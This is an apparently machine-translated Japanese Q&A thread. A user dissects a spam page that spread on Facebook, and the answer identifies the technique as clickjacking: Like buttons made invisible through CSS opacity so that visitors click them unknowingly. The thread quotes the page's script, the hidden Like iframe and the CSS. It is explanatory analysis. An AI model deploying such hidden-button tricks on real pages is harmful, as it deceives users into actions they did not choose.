0

警告: このリンクは NSFW (ポルノです) です。

1truc2dingue.com/3-une-br%C3%A9silienne-enleve-le-bas.html

これは今日広まり、FB で人気のある友人がクリックしました。私はそれがマルウェアであり、彼がプログラマーであることを知っていたので、私はそれがどのように彼をだましたかを解明するために働きに行きました.

これが私が見つけたものです。ページの最初に、次の内容があります。

<script type="text/javascript">
<!--
window.fbAsyncInit = function()
{
 FB.init({appId: '135200846551763', status: true, cookie: true, xfbml: true});
 FB.Event.subscribe('edge.create', function(href, widget) {
    document.getElementById("video").style.display= 'block';
    document.getElementById("preview").style.display= 'none';
 });
};
//-->
</script>

そこにはあまりにも秘密主義的なものは何もありません。ページが「いいね!」されると (愚かにも​​ "edge.create"と呼ばれるイベント)、プレビューが消え、ビデオ ( display:noneとして初期化されます) が表示されます。

明らかな「いいね!」がない場合、どのようにページを気に入るでしょうか。ボタン。これがスクリプトの背後にあるトリックです。スクリプトが非推奨の FBML を使用していることがわかります。

<fb:like id=f2 class=iframe href="http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html" layout="button_count" show_faces="false" width="480" style="margin-top:65px;margin-left:110px;"></fb:like>

そして、最新の iFrame API、

<iframe id=f1 class=iframe src="http://www.facebook.com/plugins/like.php?href=http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true"></iframe>
4

1 に答える 1

3

これはクリックジャッキングと呼ばれます

目に見えない「いいね」ボタンをクリックするだけです(.iframeクラス)

.iframe {
    opacity: 0;
    filter: alpha(opacity=0);
}
于 2012-08-27T03:18:20.827 に答える